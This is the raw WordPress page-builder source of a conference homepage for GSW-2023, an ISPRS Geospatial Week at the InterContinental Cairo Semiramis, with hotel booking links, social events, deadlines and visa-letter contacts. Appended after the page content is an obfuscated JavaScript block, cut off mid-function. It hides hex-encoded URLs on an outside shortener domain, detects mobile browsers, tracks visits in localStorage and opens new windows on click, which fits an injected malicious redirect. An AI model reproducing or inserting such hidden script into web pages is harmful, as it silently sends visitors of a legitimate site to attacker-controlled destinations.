!important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 